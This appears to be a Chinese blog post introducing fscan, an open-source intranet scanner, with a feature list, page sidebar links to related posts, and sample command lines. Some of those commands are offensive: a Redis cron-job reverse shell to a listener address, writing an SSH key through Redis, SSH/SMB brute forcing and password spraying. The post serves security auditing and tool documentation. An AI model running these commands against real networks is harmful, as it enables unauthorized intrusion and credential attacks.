一款专为网络专业人士设计的多功能扫描工具,支持主机存活探测、端口扫描、服务爆破、漏洞扫描等功能

于 2024-09-10 20:48:08 发布
阅读量216 收藏 2
点赞数 1
文章标签: 网络 前端 架构 源码 开源
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_68103752/article/details/142108846
版权

前言

在网络维护和安全检测中,有效的工具对于提高-效率至关重要。传统的网络扫描工具往往功能单一,需要多个工具配合使用,这不仅增加了工作的复杂度,还可能因为工具间的兼容性问题导致工作效率下降。面对这样的挑战,我们迫切需要一个能够一站式处理多种需求的方案。于是,fscan应运而生。

介绍

fscan 是一款专为网络专业人士设计的多功能扫描工具,集成了诸如主机存活探测、端口扫描、漏洞扫描等功能。它的强大之处在于能够通过简单的命令行cao作完成复杂的任务,例如针对MS17010漏洞的检查、Redis服务器的安-全配置检查等。

功能亮点

  • 信息搜集: 包括ICMP存活探测、端口扫描等。

  • 爆破功能: 支持SSH、SMB、RDP等多种服务的爆破尝试。

  • 系统信息与漏洞扫描: 如NETBIOS探测、域控识别,以及对MS17010等高危漏洞的扫描。

  • Web探测: 包括WebTitle探测、Web指纹识别、Web漏洞扫描等。

  • 漏洞利用: 比如Redis写公钥、SSH命令执行等。

  • 其他功能: 文件保存,便于后续分析和报告。

技术架构

fscan采用了先进的技术架构,确保了其在性能和稳定性上的卓越表现。它利用了高-效的并发处理机制,使得大规模网络环境下的扫描任务也能迅速完成。

部署方式

fscan的部署十分简便,只需下载可执行文件即可开始使用。同时,它也提供了丰富的命令行参数供用户根据实际需求灵活调整扫描策略。

选择合适的客户端即可。

图片

简单用法示例

  • 全功能扫描:fscan.exe -h 192.168.1.1/24

  • B段扫描:fscan.exe -h 192.168.1.1/16

  • 跳过存活检测、不保存文件、跳过Web POC扫描:fscan.exe -h 192.168.1.1/24 -np -no -nopoc

  • Redis写公钥:fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub

  • Redis计划任务反弹Shell:fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666

  • SSH爆破后执行命令:fscan.exe -h 192.168.1.1/24 -c whoami

  • 模块和端口:fscan.exe -h 192.168.1.1/24 -m ssh -p 2222

  • 加载文件的用户名、密码进行爆破:fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt

  • 扫描结果保存路径:fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt

  • 快速查看网段信息:fscan.exe -h 192.168.1.1/8

  • SMB密码碰撞:fscan.exe -h 192.168.1.1/24 -m smb -pwd password

  • 扫描单个URL并设置HTTP代理:fscan.exe -u http://baidu.com -proxy 8080

开源协议

fscan是一个遵循MIT协议的开源项目,这意味着您可以自由地使用、修改和分发此工具,使其成为商用环境的理想选择。

图片

即刻体验一波

通过上述介绍,您可以看到fscan的强大功能和灵活性。无论是在日常的网络维护还是在专业的安-全审计中,fscan都是值得信赖的伙伴。

图片

结语

fscan凭借其全面的功能和易用性,正逐步成为网络专业人士手中的利器。如果您对网络扫描工具有需求,不妨试试fscan,相信它会给您带来不一样的体验。

源码:https://github.com/shadow1ng/fscan

Java指南修炼
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网综合扫描工具fscan的详细使用
03-27
支持主机存活探测端口扫描、常见服务爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 主要功能 1.信息搜集: 存活探测(icmp) ...
fscan 内网综合扫描工具(linux)
07-21
主要功能包括主机存活探测端口扫描、常见服务爆破、高危漏洞扫描、系统信息收集、Web指纹识别和漏洞扫描等。它能够对内网中的设备进行深入的扫描和分析,帮助用户识别潜在的安全风险和漏洞 。 fscan工具的使用...
MFS 服务扫描爆破
CSDN
03-20 7522
Metasploit是一款广泛使用的渗透测试工具和漏洞利用框架,用于评估计算机系统、应用程序和网络的安全性。它最初由HD Moore开发,后来由Rapid7公司维护和支持。Metasploit框架(MSF)的服务发现功能是其一部分,用于识别目标网络上运行的主机服务服务发现是渗透测试和漏洞评估的重要步骤,帮助渗透测试人员确定目标系统的可攻击性和潜在漏洞。服务发现,主机发现,服务爆破,信息安全,Metasploit。
漏洞扫描神器/漏洞扫描工具-零开始信息安全教程
程序员三九的博客
06-13 460
这里分享一款快捷、简单的安全漏洞扫描工具fscan,普通人都能使用,简单检测一下单位内部系统的安全漏洞。
网络安全必备:Kali 中扫描器和爆破工具的选用与实践
weixin_43263566的博客
12-28 3803
kail - 扫描爆破
一款开源内网扫描工具,提供了一键自动化全方位的漏洞扫描
yunmoon的博客
06-18 567
该项目是用 Go 语言开发的内网扫描工具,提供了一键自动化全方位的漏洞扫描。它使用方便、功能全面,支持端口扫描、常见的服务爆破、Web 应用漏洞扫描、NetBIOS 嗅探等功能
Golin 弱口令/漏洞/扫描/等保/基线核查的快速安全检查小工具
02-23
主机存活探测漏洞扫描、子域名扫描端口扫描、各类服务数据库爆破、poc扫描、xss扫描、webtitle探测、web指纹识别、web敏感信息泄露、web目录浏览、web文件下载、等保安全风险问题风险自查等; 弱口令/未授权访问...
K8Cscan端口扫描插件C#源码
04-08
Cscan分为检测存活主机、非检测存活主机两个版本 程序采用多线程批量扫描大型内网IP段C段存活主机(支持上万个C段) 插件含C段旁注扫描、子域名扫描、Ftp密码爆破、Mysql密码爆、系统密码爆破存活主机扫描、Web信息...
fscan:一款内网扫描工具,方便一键大保健〜
03-11
支持主机存活探测端口扫描,常见服务爆破,ms17010,redis批量写私钥,计划任务回弹,读取win网卡信息,网络中断扫描等。趁着最近有空,用go把f-scrack插入一遍遍。使用go来编写,也有更好的扩展性及兼容性。还...
UDP协议
hyldzbg的博客
09-04 894
把当前要计算校验和的数据,每个字节,都进行累加,把结果保存到这两个字节的变量(校验和)中,过程中溢出也没关系,如果中间某个数据,出现传输错误,第二次计算的校验和就会和第一次不同(CRC这个算法其实不是特别靠谱,比如如果前一个字节大小少1,后一个字节大小多1,那么最后得到的校验和任然相同,但是数据可能已经不同了)。描绘这个数据报的报文长度(包含报头),这里的长度是指该报文有多少个字节,因为只有16位比特位的大小,因为数据传输可能会出错,所以需要一定的方法知道所传输的数据是否正确传输。
网络第五章:多路转接
qincjun的博客
09-05 592
2.HTTP1.1采用了长连接的方式来进行通信:建立连接,服务器响应完之后,不断开连接,活跃的用户对服务器发送请求,服务器都会正常响应;对不活跃的用户,不进行任何操作;events是分配好的epoll_event结构体数组.epoll将会把发生的事件赋值到events数组中 (events不可以是空指针,内核只负责把数据复制到这个events数组中,不会去帮助我们在用户态中分配内存).epoll通过这些值的设定,来监视fd的行为,如果fd做了这些行为,则会通过epoll_wait来反馈给上层,进行处理。
JAVA—网络通信
Hismybestlove的博客
09-05 1490
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
​数据链路层——流量控制&可靠传输机制 ​
最新发布
qq_25467441的博客
09-09 561
例题:一个信道的数据传输率为4kb/s ,单向传播时延为30ms ,如果使停止-等待协议的信道最大利用率达到80%,要求的数据帧长度至少为。设数据帧的长度为L比特,则发送方发送全部的数据需要时间:L/4。“停止-等待”就是每发送完一个分组就停止发送,等待对方确认,在收到确认后再发送下一个分组。因为是在讨论可靠传输的原理,所以并不考虑数据是在哪一个层次上传送的。发送方在一个发送周期内,有效地发送数据所需要的时间占整个发送周期的比率。数据链路层的流量控制是点对点的,而传输层的流量控制是端到端的。
200 Gb/s和400 Gb/s网络
dncsk的专栏
09-07 1388
116.200 Gb/s和400 Gb/s网络简介写在前面 :1.需要英文原文请自行官网下载2.本人无授权故亦不接受相关付费服务 如有商业性需求建议寻找有资质的书籍供应商购买3.翻译纯粹为爱发电,因为机器翻译所以错乱较多 建议参照英文原文对比使用 4.欢迎评论区提出建议或意见 原则上不删除评论 原则上不回复私信 和解呈现200GBASE-RPCSPMDIEEEStd802.3-2022,IEEE以太网标准第八节116.200Gb/s和400Gb/s网络116.1概述116.1范围本条款描述了200千兆位和4
[网络]HTTP协议 Cookie与Session
m0_74910646的博客
09-07 746
HTTP Cookie(也称为 Web Cookie、浏览器 Cookie 或简称 Cookie)是服务器发送到 用户浏览器并保存在浏览器上的一小块数据,它会在浏览器之后向同一服务器再次发 起请求时被携带并发送到服务器上。通常,它用于告知服务端两个请求是否来自同一浏览器,如保持用户的登录状态、记录用户偏好等。HTTP Session 是服务器用来跟踪用户与服务器交互期间用户状态的机制。由于 HTTP 协议是无状态的(每个请求都是独立的),因此服务器需要通过 Session 来记住用户的信息。
145-Linux权限维持&Rootkit后门&Strace监控&Alias别名&Cron定时任务
DamnVanish的博客
09-07 806
Linux中最强权限维持rootkit
网络协议】了解一下HTTP 与 HTTPS 的区别
想写博客却不会写,那能怎么办?抓紧练习咯!
09-05 979
2.身份认证:服务器向客户端出示TLS证书,客户端验证证书的有效性和服务器身份,确保连接到的是正确的服务提供者。因为 HTTPS 都是基于 TCP 传输协议实现的,得先建立完可靠的 TCP 连接才能做 TLS 握手的事情。1.加密通信:HTTPS通过TLS证书实现对数据的加密处理,只有当拥有正确密钥的接收方才能解读数据内容。HTTPS 建立连接的过程,先进行 TCP 三次握手,再进行 TLS 四次握手。3.数据完整性:除了加密外,HTTPS还利用。明文传输:数据以明文的形式传输,不加密,容易被截获和窃听。
综合DHCP、ACL、NAT、Telnet和PPPoE进行网络设计练习
m0_62909438的博客
09-07 1114
通过学习到的DHCP、NAT、ACL、Telnet和PPPoE技术,进行综合实验配置,掌握这些技术的配置,了解其用法,加深命令印象。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值